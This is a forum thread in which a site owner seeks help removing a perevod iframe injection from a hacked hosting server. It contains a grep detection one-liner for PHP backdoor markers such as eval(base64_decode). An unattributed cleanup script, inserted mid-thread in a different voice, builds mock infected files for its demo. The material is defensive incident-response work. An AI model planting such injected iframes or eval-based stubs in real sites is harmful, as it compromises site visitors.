#1  Just Joined! | Join Date: Feb 2013 | Posts: 5

    hosting server find and replace script?


    I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, all heck broke loose. I had a plugin hacked and yes I am 99% certain it was the mobi access as timing is way too coincidental. So now I have an infected hosting server. I was told to write a find and replace script by their tech support. To be honest I have not worked with Linux/Unix in years (1980s) and am not confident enough to try this without advice.

    I will give below the line so you can see what's found. The tech support guy was kind enough to do a search for the perevod.me iframes hack/infection.

    find ./ -type f \( -iname \*.php -o -iname \*html\* -o -iname \*.js \) -print0 |xargs -0 egrep -ils '(eval\(base64\_decode|Array\(base64\_decode|\/*\/preg\_replace\(|function_exists\(.*\_jquery\_theme |iframe src\=\"xxxx\:\/\/perevod)'

    had to replace the http with xxxx above because the site here thinks I am posting a link.

    Now I have to figure out how to use a script to remove this trash.

    Additional question: I found out the site perevod dot me is a fraud site according to the WHOIS information. The site city is fake, judging by the zip code, the telephone number is a sales infomercial for HGH, and the street address is also fake. I thought ICANN would disallow a registration over the fraud. How can I get this site removed as it is the hackers'/infection site and it is also a blacklisted site loaded with really bad malware.

    Anyways can anyone give me some advice on how to do a find and replace script?

#2  Irithori, Trusted Penguin | Join Date: May 2009 | Location: Munich | Posts: 3,444
    Hi and welcome

    Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.

    My recommendation is to take this host off the net,
    analyze how the hack happened
    backup and verify your data, config and logs
    and then install a new system.
    You must always face the curtain with a bow.

#3  Just Joined! | Join Date: Feb 2013 | Posts: 5
    The problem appears to be the plugin. This was looked at by myself and two techs at the server hosting company, and the techs reported the exploit to their management to have the plugin company put on notice. So this problem and plugin has been banished, and since then there have been zero intrusions. Now I need to get rid of the iframes left over.



    Quote Originally Posted by Irithori View Post
    Hi and welcome

    Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.

    My recommendation is to take this host off the net,
    analyze how the hack happened
    backup and verify your data, config and logs
    and then install a new system.

#4  Irithori, Trusted Penguin | Join Date: May 2009 | Location: Munich | Posts: 3,444
    Best practice is to reinstall. Your call.

    The find line in your first post will provide a filelist.
    So the next best recommendation is to recover these files from a point in time before this plugin has been installed.

#5  Just Joined! | Join Date: Feb 2013 | Posts: 5
    A backup and reinstall will not work. They did a huge upgrade and server maintenance Sunday and all the backups are corrupted now. Plus the backups are not old enough to be prior to the plugin addition months ago. Yes, I should not have trusted the server to have good backups going back that far, but what's done is done.

    I need to know how to write a find and replace to remove this problem as all the 400.shtml files are also infected, this infection is so pervasive it has even infected themes and you name it. So short of destroying years of work, and site information, I need to try a script to avoid the loss of several years of running 3 sites.

    Does anyone have enough knowledge to advise me how to write such a script?


    Quote Originally Posted by Irithori View Post
    Best practice is to reinstall. Your call.

    The find line in your first post will provide a filelist.
    So the next best recommendation is to recover these files from a point in time before this plugin has been installed.

#6  Irithori, Trusted Penguin | Join Date: May 2009 | Location: Munich | Posts: 3,444
    Search&replace is hard if neither the current infected nor the previous good state is given.
    I tried to find technical background information about what "perevod" actually changes, especially whether really only web files (.html, .js, etc.) are affected.
    But apart from pointers to some obscure Russian sites, I couldn't find anything.

    As you and the techs looked at the hack: Can you tell and print in total what has been inserted?
    For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
    Also please use code tags.
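The script the thread keeps circling around, as an added example (my code, not the original poster's, Irithori's, or the hosting company's): it reuses the file selection from the find/egrep one-liner in the first post, copies every hit to a backup directory before touching it, strips only the known injected iframe, and does not edit files that match eval(base64_decode at all, because those are PHP code rather than a stray HTML tag and a line-level regex edit usually leaves them broken or still backdoored. Assumptions of mine, not from the thread: the iframe is one <iframe ...></iframe> element on a single line, and "xxxx://perevod" stands in for the real scheme and host exactly as the poster wrote it; the sample docroot the script builds is constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread or from the hosting company's
# support. Same file selection as the find/egrep one-liner in the first post;
# every hit is backed up, the known injected <iframe> is stripped, and files
# containing eval(base64_decode are only reported (PHP code: restore it from
# a clean copy instead of regex-editing it).
# Assumptions (mine): the iframe is a single <iframe ...></iframe> element on
# one line; "xxxx://perevod" stands for the real scheme and host as in the post.
set -eu

MARKER='xxxx://perevod'

# Constructed sample docroot so the script can be run offline.
make_sample_site() {
    root=$1
    mkdir -p "$root/themes/x" "$root/forums/cache"
    printf '<html><body>hello<iframe src="%s/in.php" width="1" height="1"></iframe></body></html>\n' \
        "$MARKER" > "$root/index.html"
    printf '<?php print theme(); ?>\n<iframe src="%s/in.php"></iframe>\n' \
        "$MARKER" > "$root/themes/x/page.tpl.php"
    printf '<?php eval(base64_decode("aGVsbG8=")); ?>\n' > "$root/forums/cache/x.html.php"
    printf '<html>clean</html>\n' > "$root/clean.html"
}

# File selection from the first post, narrowed to the two indicators handled here.
list_suspect_files() {
    find "$1" -type f \( -iname '*.php' -o -iname '*html*' -o -iname '*.js' \) -print0 \
      | xargs -0 grep -Els "eval\(base64_decode|iframe src=\"$MARKER" 2>/dev/null || true
}

# Keep an untouched copy of every file before it is edited (same path under $2).
backup_file() {
    f=$1; bdir=$2
    mkdir -p "$bdir/$(dirname "$f")"
    cp -p "$f" "$bdir/$f"
}

# Delete the injected iframe element; nothing else in the file changes.
# The edit goes through a temp file outside the docroot so find never sees it.
strip_iframe() {
    f=$1; tmp=$(mktemp)
    sed -E "s#<iframe[^>]*src=\"$MARKER[^>]*>[^<]*</iframe>##g" "$f" > "$tmp"
    cat "$tmp" > "$f"      # overwrite in place, keeping owner and mode
    rm -f "$tmp"
}

# Walk the suspect list and print one line per file with the action taken.
clean_site() {
    root=$1; bdir=$2
    list_suspect_files "$root" | while IFS= read -r f; do
        backup_file "$f" "$bdir"
        if grep -Eq 'eval\(base64_decode' "$f"; then
            echo "REVIEW  $f  (PHP backdoor indicator: restore from a clean copy, do not regex-edit)"
        fi
        if grep -Fq "src=\"$MARKER" "$f"; then
            strip_iframe "$f"
            echo "CLEANED $f"
        fi
    done
}

# Demo on the constructed tree: sh thisscript.sh --demo
if [ "${1:-}" = "--demo" ]; then
    site=$(mktemp -d)
    make_sample_site "$site"
    clean_site "$site" "$site.bak"
fi
```

On a real docroot the call is `clean_site /home/you/public_html /root/iframe-cleanup-backup`, run as the file owner, with the site taken offline first. The backup directory should live outside the docroot so it is neither served nor rescanned, and every REVIEW line is a file to restore from a clean copy of the same software version rather than edit.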

#7  Just Joined! | Join Date: Feb 2013 | Posts: 5
    Here is a find script we used. This may be only a partial list.

    ..........................................

    ./builder/loader_err.html
    ./builder/mobifiles/d2/res/themes/images/bgMetal.html
    ./builder/mobifiles/d2/res/themes/images/chevron.html
    ./builder/mobifiles/d2/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d2/res/themes/.html
    ./builder/mobifiles/d2/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d4/res/themes/images/bgMetal.html
    ./builder/mobifiles/d4/res/themes/images/chevron.html
    ./builder/mobifiles/d4/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d4/res/themes/.html
    ./builder/mobifiles/d4/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d9/res/themes/images/bgMetal.html
    ./builder/mobifiles/d9/res/themes/images/chevron.html
    ./builder/mobifiles/d9/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d9/res/themes/.html
    ./builder/mobifiles/d9/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d3/res/themes/images/bgMetal.html
    ./builder/mobifiles/d3/res/themes/images/chevron.html
    ./builder/mobifiles/d3/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d3/res/themes/.html
    ./builder/mobifiles/d3/res/themes/apple/img/listArrow.html
    ./themes/sandium/page.tpl.php
    ./themes/bluemarine/page.tpl.php
    ./themes/garland/maintenance-page.tpl.php
    ./themes/garland/page.tpl.php
    ./themes/acquia_prosper/page.tpl.php
    ./themes/newswire/page.tpl.php
    ./themes/soldier/page.tpl.php
    ./themes/admire_navy_5.x-1.3/admire_navy/page.tpl.php
    ./themes/acquia_slate/page.tpl.php
    ./themes/pushbutton/page.tpl.php
    ./themes/elements_theme/page.tpl.php
    ./themes/colourise/maintenance-page.tpl.php
    ./themes/colourise/page.tpl.php
    ./themes/bealestreet/themes/bealestreet/page.tpl.php
    ./themes/addari/page.tpl.php
    ./themes/newsflash/page.tpl.php
    ./themes/admire_grunge/page.tpl.php
    ./themes/burn_360-0.7.4/README.html
    ./themes/burn_360-0.7.4/README.html~
    ./themes/genesis_darkmatter/page.tpl.php
    ./themes/tma/tma/page.tpl.php
    ./forums/install.bak/database_update.php
    ./forums/install.bak/index.php
    ./forums/cache/tpl_AeroBlack_viewtopic_print.html.php
    ./forums/cache/ctpl_admin_simple_footer.html.php
    ./forums/cache/tpl_AeroBlack_overall_footer.html.php
    ./forums/cache/tpl_AeroBlack_simple_footer.html.php
    ./forums/cache/ctpl_admin_overall_footer.html.php
    ./forums/styles/PlayStation/template/viewtopic_print.html
    ./forums/styles/PlayStation/template/simple_footer.html
    ./forums/styles/PlayStation/template/overall_footer.html
    ./forums/styles/PlayStation/template/ucp_pm_viewmessage_print.html
    ./forums/styles/GTA4/template/viewtopic_print.html
    ./forums/styles/GTA4/template/simple_footer.html
    ./forums/styles/GTA4/template/overall_footer.html
    ./forums/styles/GTA4/template/ucp_pm_viewmessage_print.html
    ./forums/styles/pro_MylCastel/template/viewtopic_print.html
    ./forums/styles/pro_MylCastel/template/simple_footer.html
    ./forums/styles/pro_MylCastel/template/overall_footer.html
    ./forums/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
    ./forums/styles/Pro_iphone/template/viewtopic_print.html
    ./forums/styles/Pro_iphone/template/simple_footer.html
    ./forums/styles/Pro_iphone/template/overall_footer.html
    ./forums/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
    ./forums/styles/SpringFlowers/template/viewtopic_print.html
    ./forums/styles/SpringFlowers/template/simple_footer.html
    ./forums/styles/SpringFlowers/template/overall_footer.html
    ./forums/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
    ./forums/styles/360Elite/template/viewtopic_print.html
    ./forums/styles/360Elite/template/simple_footer.html
    ./forums/styles/360Elite/template/overall_footer.html
    ./forums/styles/360Elite/template/ucp_pm_viewmessage_print.html
    ./forums/styles/OATempleofZeus/template/viewtopic_print.html
    ./forums/styles/OATempleofZeus/template/simple_footer.html
    ./forums/styles/OATempleofZeus/template/overall_footer.html
    ./forums/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
    ./forums/styles/hardcamo/template/viewtopic_print.html
    ./forums/styles/hardcamo/template/simple_footer.html
    ./forums/styles/hardcamo/template/overall_footer.html
    ./forums/styles/hardcamo/template/ucp_pm_viewmessage_print.html
    ./forums/styles/OAstrawberry/template/viewtopic_print.html
    ./forums/styles/OAstrawberry/template/simple_footer.html
    ./forums/styles/OAstrawberry/template/overall_footer.html
    ./forums/styles/OAstrawberry/template/ucp_pm_viewmessage_print.html
    ./forums/styles/Xbox_360/template/viewtopic_print.html
    ./forums/styles/Xbox_360/template/simple_footer.html
    ./forums/styles/Xbox_360/template/overall_footer.html
    ./forums/styles/Xbox_360/template/ucp_pm_viewmessage_print.html
    ./forums/styles/template/viewtopic_print.html
    ./forums/styles/template/simple_footer.html
    ./forums/styles/template/overall_footer.html
    ./forums/styles/template/ucp_pm_viewmessage_print.html
    ./forums/styles/AeroBlack/template/viewtopic_print.html
    ./forums/styles/AeroBlack/template/simple_footer.html
    ./forums/styles/AeroBlack/template/overall_footer.html
    ./forums/styles/AeroBlack/template/ucp_pm_viewmessage_print.html
    ./forums/installer-disabled/database_update.php
    ./forums/installer-disabled/index.php
    ./forums/install.old/database_update.php
    ./forums/install.old/index.php
    ./modules/book/book-export-html.tpl.php
    ./modules/system/maintenance-page.tpl.php
    ./modules/system/page.tpl.php
    ./401.shtml
    ./500.php
    ./403.shtml
    ./blogs/wp-includes/js/codepress/codepress.html
    ./blogs/wp-admin/import/blogware.php
    ./blogs/wp-admin/import/livejournal.php
    ./blogs/wp-admin/sidebar.php
    ./blogs/wp-content/themes/default/comments-popup.php
    ./blogs/wp-content/themes/default/footer.php
    ./blogs/wp-content/themes/classic/comments-popup.php
    ./blogs/wp-content/themes/classic/footer.php
    ./blogs/wp-content/themes/news-magazine-theme-640/footer.php
    ./administrator/components/com_joomlaxplorer/images/index.html
    ./administrator/components/com_joomlaxplorer/scripts/index.html
    ./administrator/components/com_joomlaxplorer/scripts/codepress/codepress.html
    ./administrator/components/com_joomlaxplorer/scripts/codepress/index.html
    ./administrator/components/com_joomlaxplorer/languages/index.html
    ./administrator/components/com_joomlaxplorer/style/index.html
    ./administrator/components/com_joomlaxplorer/index.html
    ./administrator/components/com_joomlaxplorer/ftp_tmp/index.html
    ./administrator/components/com_joomlaxplorer/include/fun_system_info.php
    ./administrator/components/com_joomlaxplorer/include/index.html
    ./administrator/components/com_joomlaxplorer/config/index.html
    ./administrator/components/com_joomlaxplorer/libraries/MIME/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Writer/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Predicate/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Reader/index.html
    ./administrator/components/com_joomlaxplorer/libraries/index.html
    ./administrator/components/com_joomlaxplorer/libraries/FTP/index.html
    ./templates/images/copyrights/fam_fam_silk/index.html
    ./templates/images/copyrights/index.html
    ./templates/images/copyrights/tango/index.html
    ./templates/images/rtl/index.html
    ./templates/images/index.html
    ./templates/images/icons/index.html
    ./templates/soldier_of_fortune/component.php
    ./templates/soldier_of_fortune/index.html
    ./templates/soldier_of_fortune/html/mod_mainmenu/index.html
    ./templates/soldier_of_fortune/html/index.html
    ./templates/soldier_of_fortune/html/mod_syndicate/index.html
    ./templates/soldier_of_fortune/html/com_content/section/index.html
    ./templates/soldier_of_fortune/html/com_content/article/index.html
    ./templates/soldier_of_fortune/html/com_content/index.html
    ./templates/soldier_of_fortune/html/com_content/frontpage/index.html
    ./templates/soldier_of_fortune/html/com_content/category/index.html
    ./templates/com_gantry/tmpl/index-iphone.php
    ./templates/com_gantry/facets/menu/themes/basic/index.html
    ./templates/com_gantry/facets/menu/themes/touch/index.html
    ./templates/com_gantry/facets/menu/themes/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/images/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/js/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/css/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/index.html
    ./templates/com_gantry/facets/menu/index.html
    ./templates/com_gantry/admin/phpQuery.php
    ./templates/com_gantry/admin/ajax-models/diagnostics.php
    ./templates/com_gantry/admin/index.html
    ./templates/component.php
    ./templates/css/index.html
    ./templates/layouts/default.php
    ./templates/rt_grunge_j15/images/backgrounds/index.html
    ./templates/rt_grunge_j15/images/backgrounds/style1/index.html
    ./templates/rt_grunge_j15/images/body/index.html
    ./templates/rt_grunge_j15/images/body/style1/index.html
    ./templates/rt_grunge_j15/images/typography/index.html
    ./templates/rt_grunge_j15/images/index.html
    ./templates/rt_grunge_j15/images/icons/index.html
    ./templates/rt_grunge_j15/images/logo/index.html
    ./templates/rt_grunge_j15/images/logo/style1/index.html
    ./templates/rt_grunge_j15/js/index.html
    ./templates/rt_grunge_j15/debugbody.php
    ./templates/rt_grunge_j15/component.php
    ./templates/rt_grunge_j15/custom/menuitemparams/index.html
    ./templates/rt_grunge_j15/custom/index.html
    ./templates/rt_grunge_j15/css/index.html
    ./templates/rt_grunge_j15/params/index.html
    ./templates/rt_grunge_j15/index.php
    ./templates/rt_grunge_j15/admin/index.html
    ./templates/rt_grunge_j15/admin/presets/index.html
    ./templates/rt_grunge_j15/features/index.html
    ./templates/rt_grunge_j15/profile.php
    ./templates/rt_grunge_j15/html/mod_poll/index.html
    ./templates/rt_grunge_j15/html/mod_login/index.html
    ./templates/rt_grunge_j15/html/mod_breadcrumbs/index.html
    ./templates/rt_grunge_j15/html/mod_newsflash/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/categories/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/weblink/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/category/index.html
    ./templates/rt_grunge_j15/html/com_contact/contact/index.html
    ./templates/rt_grunge_j15/html/com_contact/category/index.html
    ./templates/rt_grunge_j15/html/index.html
    ./templates/rt_grunge_j15/html/com_poll/poll/index.html
    ./templates/rt_grunge_j15/html/com_poll/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/newsfeed/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/categories/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/category/index.html
    ./templates/rt_grunge_j15/html/com_content/section/section/index.html
    ./templates/rt_grunge_j15/html/com_content/section/index.html
    ./templates/rt_grunge_j15/html/com_content/article/index.html
    ./templates/rt_grunge_j15/html/com_content/index.html
    ./templates/rt_grunge_j15/html/com_content/frontpage/index.html
    ./templates/rt_grunge_j15/html/com_content/category/index.html
    ./templates/rt_grunge_j15/html/com_content/category/category/index.html
    ./templates/rt_grunge_j15/html/com_rokcandy/index.html
    ./templates/error.php
    ./templates/pizza/images/copyrights/fam_fam_silk/index.html
    ./templates/pizza/images/copyrights/index.html
    ./templates/pizza/images/copyrights/tango/index.html
    ./templates/pizza/images/rtl/index.html
    ./templates/pizza/images/index.html
    ./templates/pizza/images/icons/index.html
    ./templates/pizza/component.php
    ./templates/pizza/css/index.html
    ./templates/pizza/layouts/default.php
    ./templates/pizza/index.html
    ./templates/pizza/html/mod_poll/index.html
    ./templates/pizza/html/mod_login/index.html
    ./templates/pizza/html/mod_newsflash/index.html
    ./templates/pizza/html/com_weblinks/categories/index.html
    ./templates/pizza/html/com_weblinks/index.html
    ./templates/pizza/html/com_weblinks/category/index.html
    ./templates/pizza/html/com_contact/contact/index.html
    ./templates/pizza/html/com_contact/index.html
    ./templates/pizza/html/com_contact/category/index.html
    ./templates/pizza/html/mod_latestnews/index.html
    ./templates/pizza/html/com_search/search/index.html
    ./templates/pizza/html/com_search/index.html
    ./templates/pizza/html/mod_footer/index.html
    ./templates/pizza/html/com_user/reset/index.html
    ./templates/pizza/html/com_user/user/index.html
    ./templates/pizza/html/com_user/login/index.html
    ./templates/pizza/html/com_user/index.html
    ./templates/pizza/html/com_user/remind/index.html
    ./templates/pizza/html/com_user/register/index.html
    ./templates/pizza/html/mod_search/index.html
    ./templates/pizza/html/index.html
    ./templates/pizza/html/com_poll/poll/index.html
    ./templates/pizza/html/com_poll/index.html
    ./templates/pizza/html/mod_syndicate/index.html
    ./templates/pizza/html/com_newsfeeds/newsfeed/index.html
    ./templates/pizza/html/com_newsfeeds/categories/index.html
    ./templates/pizza/html/com_newsfeeds/index.html
    ./templates/pizza/html/com_newsfeeds/category/index.html
    ./templates/pizza/html/com_content/section/index.html
    ./templates/pizza/html/com_content/article/index.html
    ./templates/pizza/html/com_content/index.html
    ./templates/pizza/html/com_content/frontpage/index.html
    ./templates/pizza/html/com_content/category/index.html
    ./templates/themza_j15_17/images/index.html
    ./templates/themza_j15_17/js/index.html
    ./templates/themza_j15_17/component.php
    ./templates/themza_j15_17/css/index.html
    ./templates/themza_j15_17/index.html
    ./templates/themza_j15_17/index.php
    ./templates/themza_j15_17/html/index.html
    ./templates/html/mod_poll/index.html
    ./templates/html/mod_login/index.html
    ./templates/html/mod_newsflash/index.html
    ./templates/html/com_weblinks/categories/index.html
    ./templates/html/com_weblinks/index.html
    ./templates/html/com_weblinks/category/index.html
    ./templates/html/com_contact/contact/index.html
    ./templates/html/com_contact/index.html
    ./templates/html/com_contact/category/index.html
    ./templates/html/mod_latestnews/index.html
    ./templates/html/com_search/search/index.html
    ./templates/html/com_search/index.html
    ./templates/html/mod_footer/index.html
    ./templates/html/com_user/reset/index.html
    ./templates/html/com_user/user/index.html
    ./templates/html/com_user/login/index.html
    ./templates/html/com_user/index.html
    ./templates/html/com_user/remind/index.html
    ./templates/html/com_user/register/index.html
    ./templates/html/mod_search/index.html
    ./templates/html/index.html
    ./templates/html/com_poll/poll/index.html
    ./templates/html/com_poll/index.html
    ./templates/html/mod_banners/index.html
    ./templates/html/mod_syndicate/index.html
    ./templates/html/com_newsfeeds/newsfeed/index.html
    ./templates/html/com_newsfeeds/categories/index.html
    ./templates/html/com_newsfeeds/index.html
    ./templates/html/com_newsfeeds/category/index.html
    ./templates/html/com_content/section/index.html
    ./templates/html/com_content/article/index.html
    ./templates/html/com_content/index.html
    ./templates/html/com_content/frontpage/index.html
    ./templates/html/com_content/category/index.html
    ./templates/black_joomla_v1.0/component.php
    ./templates/black_joomla_v1.0/index.html
    ./templates/black_joomla_v1.0/index.php
    ./templates/black_joomla_v1.0/html/mod_mainmenu/index.html
    ./templates/black_joomla_v1.0/html/index.html
    ./templates/black_joomla_v1.0/html/mod_syndicate/index.html
    ./templates/black_joomla_v1.0/html/com_content/section/index.html
    ./templates/black_joomla_v1.0/html/com_content/article/index.html
    ./templates/black_joomla_v1.0/html/com_content/index.html
    ./templates/black_joomla_v1.0/html/com_content/frontpage/index.html
    ./templates/black_joomla_v1.0/html/com_content/category/index.html
    ./templates/iyosisj1/component.php
    ./templates/iyosisj1/index.php
    ./templates/iyosisj1/html/mod_banners/index.html
    ./templates/iyosisj1/html/com_content/section/index.html
    ./templates/iyosisj1/html/com_content/article/index.html
    ./templates/iyosisj1/html/com_content/index.html
    ./templates/iyosisj1/html/com_content/frontpage/index.html
    ./templates/iyosisj1/html/com_content/category/index.html
    ./index.html
    ./gallery/themes/stopdesign/albumarchive.php
    ./gallery/zp-core/refresh-metadata.php
    ./gallery/zp-core/albumsort.php
    ./gallery/zp-core/dynamic.php
    ./gallery/zp-core/cache-images.php
    ./profiles/wp-login.php
    ./profiles/modules/admin_help_english/docs/upgrade.html
    ./profiles/modules/admin_help_english/docs/admin_comments.html
    ./profiles/modules/admin_help_english/docs/users.html
    ./profiles/modules/admin_help_english/docs/modules.html
    ./profiles/modules/admin_help_english/docs/admin_index.html
    ./profiles/modules/admin_help_english/docs/templates.html
    ./profiles/modules/admin_help_english/docs/register.html
    ./profiles/modules/admin_help_english/docs/admin_modules.html
    ./profiles/modules/admin_help_english/docs/admin_users.html
    ./profiles/modules/admin_help_english/docs/vote.html
    ./profiles/modules/admin_help_english/docs/admin_categories.html
    ./profiles/modules/admin_help_english/docs/pligg_pro.html
    ./profiles/modules/admin_help_english/docs/core.html
    ./profiles/modules/admin_help_english/docs/admin_backup.html
    ./profiles/modules/admin_help_english/docs/admin_links.html
    ./profiles/modules/admin_help_english/docs/template_edit.html
    ./profiles/modules/admin_help_english/docs/admin_page.html
    ./profiles/modules/admin_help_english/docs/walkthrough.html
    ./profiles/modules/admin_help_english/docs/submit.html
    ./profiles/modules/admin_help_english/docs/welcome.html
    ./profiles/languages/readme_thai.html
    ./profiles/wp-includes/js/codepress/codepress.html
    ./profiles/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
    ./profiles/wp-includes/js/tinymce/wp-mce-help.php
    ./profiles/wp-includes/theme-compat/comments-popup.php
    ./profiles/wp-includes/theme-compat/footer.php
    ./profiles/wp-includes/functions.php
    ./profiles/wp-includes/functions.wp-scripts.php
    ./profiles/wp-includes/ms-deprecated.php
    ./profiles/wp-includes/ms-functions.php
    ./profiles/wp-includes/load.php
    ./profiles/wp-includes/wpmu-functions.php
    ./profiles/3rdparty/speller/spellchecker.html
    ./profiles/3rdparty/speller/server-scripts/spellchecker.php
    ./profiles/3rdparty/speller/controls.html
    ./profiles/wp-admin/import/blogware.php
    ./profiles/wp-admin/import/livejournal.php
    ./profiles/wp-admin/sidebar.php
    ./profiles/wp-admin/ms-edit.php
    ./profiles/wp-admin/maint/repair.php
    ./profiles/wp-admin/press-this.php
    ./profiles/wp-admin/install.php
    ./profiles/wp-admin/includes/media.php
    ./profiles/wp-admin/includes/template.php
    ./profiles/wp-admin/admin-footer.php
    ./profiles/wp-admin/upgrade.php
    ./profiles/wp-admin/wpmu-edit.php
    ./profiles/wp-admin/setup-config.php
    ./profiles/wp-content/themes/bphome/comments-popup.php
    ./profiles/wp-content/themes/bphome/footer.php
    ./profiles/wp-content/themes/home/comments-popup.php
    ./profiles/wp-content/themes/home/footer.php
    ./profiles/wp-content/themes/default/comments-popup.php
    ./profiles/wp-content/themes/default/footer.php
    ./profiles/wp-content/themes/classic/comments-popup.php
    ./profiles/wp-content/themes/classic/footer.php
    ./profiles/wp-content/themes/bp-sn-parent/footer.php
    ./profiles/wp-content/themes/twentyten/footer.php
    ./profiles/wp-content/themes/bp-default/footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-templates/kakumei/footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-admin/admin-footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/backpress/functions.core.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/functions.bb-core.php
    ./profiles/wp-content/plugins/buddypress/bp-themes/bp-default/footer.php
    ./profiles/wp-content/bp-themes/bpmember/footer.php
    ./profiles/wp-content/bp-themes/bpskeletonmember/footer.php
    ./profiles/wp-links-opml.php
    ./profiles/cache/templates_c/c_1__admin_admin_tpl.php
    ./profiles/cache/templates_c/c_1_wistie_pligg_tpl.php
    ./profiles/index-install.php
    ./profiles/admin/index.php
    ./profiles/libs/backup/mysql_backup/libs/gonxtabs.class.php
    ./profiles/libs/pre_install_check.php
    ./profiles/wp-app.php
    ./profiles/readme.html
    ./forumsold/instal.bat/database_update.php
    ./forumsold/instal.bat/index.php
    ./forumsold/download/file.php
    ./forumsold/docs/INSTALL.html
    ./forumsold/docs/README.html
    ./forumsold/docs/FAQ.html
    ./forumsold/docs/coding-guidelines.html
    ./forumsold/docs/hook_system.html
    ./forumsold/docs/auth_api.html
    ./forumsold/docs/CHANGELOG.html
    ./forumsold/includes/functions_jabber.php
    ./forumsold/includes/functions.php
    ./forumsold/includes/db/dbal.php
    ./forumsold/includes/acp/acp_php_info.php
    ./forumsold/adm/style/simple_footer.html
    ./forumsold/adm/style/overall_footer.html
    ./forumsold/adm/style/colour_swatch.html
    ./forumsold/adm/style/install_footer.html
    ./forumsold/cache/tpl_pro-MylCastel_overall_footer.html.php
    ./forumsold/cache/tpl_buziness-board_simple_footer.html.php
    ./forumsold/cache/tpl_martial_overall_footer.html.php
    ./forumsold/cache/ctpl_admin_simple_footer.html.php
    ./forumsold/cache/tpl_prosilver_overall_footer.html.php
    ./forumsold/cache/tpl_AeroBlack_overall_footer.html.php
    ./forumsold/cache/tpl_OATempleofZeus_overall_footer.html.php
    ./forumsold/cache/tpl_Pro-iphone_overall_footer.html.php
    ./forumsold/cache/tpl_buziness-board_overall_footer.html.php
    ./forumsold/cache/ctpl_admin_overall_footer.html.php
    ./forumsold/styles/pro_MylCastel/template/viewtopic_print.html
    ./forumsold/styles/pro_MylCastel/template/simple_footer.html
    ./forumsold/styles/pro_MylCastel/template/overall_footer.html
    ./forumsold/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/subsilver2/template/viewtopic_print.html
    ./forumsold/styles/subsilver2/template/simple_footer.html
    ./forumsold/styles/subsilver2/template/overall_footer.html
    ./forumsold/styles/subsilver2/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/Pro_iphone/template/viewtopic_print.html
    ./forumsold/styles/Pro_iphone/template/simple_footer.html
    ./forumsold/styles/Pro_iphone/template/overall_footer.html
    ./forumsold/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/SpringFlowers/template/viewtopic_print.html
    ./forumsold/styles/SpringFlowers/template/simple_footer.html
    ./forumsold/styles/SpringFlowers/template/overall_footer.html
    ./forumsold/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/OATempleofZeus/template/viewtopic_print.html
    ./forumsold/styles/OATempleofZeus/template/simple_footer.html
    ./forumsold/styles/OATempleofZeus/template/overall_footer.html
    ./forumsold/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/buziness_board/template/viewtopic_print.html
    ./forumsold/styles/buziness_board/template/simple_footer.html

    Quote Originally Posted by Irithori View Post
    Search & replace is hard if neither the current infected nor the previous good state is given.
    I tried to find technical background information about what "perevod" actually changes, especially whether really only web files (.html, .js, etc.) are affected.
    But apart from pointers to some obscure Russian sites, I couldn't find anything.

    As you and the techs looked at the hack: can you tell and print in total what has been inserted?
    For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
    Also please use code tags.

  9. #8
    Linux Engineer
    Join Date
    Apr 2012
    Location
    Virginia, USA
    Posts
    917
    Quote Originally Posted by bailenforcer View Post
    I need to know how to write a find and replace to remove this problem, as all the 400.shtml files are also infected; this infection is so pervasive it has even infected themes and you name it. So, short of destroying years of work and site information, I need to try a script to avoid the loss of several years of running 3 sites.

    Does anyone have enough knowledge to advise me how to write such a script?
    So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords.

    Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
    grep -i iframe *
    That will search each file in the directory for an instance of "iframe"
    The output of the command will be something like:
    filename1: <iframe> blahblahblah
    filename2: blha <ifRamE>blah blah blah

    You get it.

    Also change the admin login passwords for your website's admin login area, if applicable.

    Also, I would run the same steps with
    grep -i script *
    and manually review each and every instance of a script reference. Lots of times there are off-site JavaScript files embedded in each of the files.

